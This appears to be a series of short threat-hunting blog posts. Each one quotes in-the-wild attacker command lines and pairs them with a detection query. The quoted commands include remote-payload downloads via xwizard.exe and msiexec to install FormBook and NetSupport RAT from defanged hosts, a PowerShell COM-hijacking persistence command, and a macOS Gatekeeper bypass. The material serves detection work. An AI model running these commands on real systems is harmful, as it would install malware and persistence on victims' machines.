Know Your Adversary

Hello everyone! We already talked about abusing forensic and incident response tools. Let's look at a curious example of how adversaries leverage such software instead of Remote Access Tools (T1219) . According to Sophos report , an adversary leveraged  Velociraptor , which was configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev .  Yes, you may even use Velociraptor in your environment, but it's unlikely be configured to communicate with workers[.]dev domains. And we can use it to build the query: event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "velociraptor.exe" See you tomorrow!

Hello everyone! Do you remember PowerShell has almost countless number of procedures? So today we'll look at another one, which includes the following technique:  Event Triggered Execution: Component Object Model Hijacking (T1546.015) . This time the example we are going to look at belongs to Head Mare (or Rainbow Hyena). One more time the adversary leveraged malicious LNK files in order to execute the following PowerShell command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}el...

Hello everyone! There're lots of LOLBAS, but are all of them used in-the-wild? Let's look how real adversaries abuse Extensible Wizards Host Process for  Ingress Tool Transfer (T1105) . So, Extensible Wizards Host Process can be used by adversaries to download a malicious file from a remote server. Here's an example  related to FormBook : XwIZarD.exe  RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z hXXps://gbuarts[.]com/cc/Protected.exe For example, we can look for xwizard.exe executions with "http" among command line parameters: event_type: "processcreatewin" AND proc_file_path: "XwIZarD.exe" AND cmdline: *http* See you tomorrow!

Hello everyone! In many cases adversaries are deobfuscating or decoding downloaded or dropped payloads. Of course, they often use LOLBAS for it. So let's look at an example of  Deobfuscate/Decode Files or Information (T1140) . As always, we need some procedure examples. And we'll extract it from this report on  Ghostwriter . Here're a few examples of how the threat actors abuse expand.exe : "C:\Windows\System32\expand.exe" "C:\Users\<USER>\AppData\Local\Temp\sdw9gobh0n" "C:\Users\<USER>\AppData\Local\Logs\sdw9gobh0n.log" "%windir%\System32\expand.exe" %ProgramData%\OfficeRuntimeBroker.xlam %ProgramData%\~OfficeRuntimeBroker.dat Usually it's used with CAB files, so we can search for executions without this file type among command line arguments: event_type: "processcreatewin" AND proc_file_path: "expand.exe" AND NOT cmdline: *cab Tune it based on your own telemetry! For example, you may also need to...

Hello everyone! Let's talk a bit about defense evasion. But not Windows. And not Linux. Today we're going to look at a procedure related to the following technique:  Subvert Trust Controls: Gatekeeper Bypass (T1553.001) . And we'll look at  SHAMOS , a variant of Atomic macOS Stealer (AMOS). To bypass Gatekeeper checks, it clears all attributes using xattr: sudo -S xattr -c /tmp/update We can hunt for clearing attributes for suspicious files located under /tmp : event_type: "processcreatemac" AND proc_file_path: "xattr" AND cmdline: ("c" AND "tmp") See you tomorrow!

Hello everyone! There're lots of legitimate binaries used by threat actors as a part of ClickFix. PowerShell, Windows Command Shell, mshta... But today we'll look at the following technique:  System Binary Proxy Execution: Msiexec (T1218.007) . This time the adversary abused msiexec to install NetSupport RAT to the compromised system: msiexec /i hXXps://cf-2-up[.]com/res/skirthub /qn 87af19ba=a296378a+606fc0b0*05a130cd(980b6676^174d7ea5*b01eaa45 For example, we can look for msiexec running files without .msi extension from a remote server: event_type: "processcreatewin" AND proc_file_path: "msiexec.exe" AND cmdline: *http* AND NOT cmdline: *msi* See you tomorrow!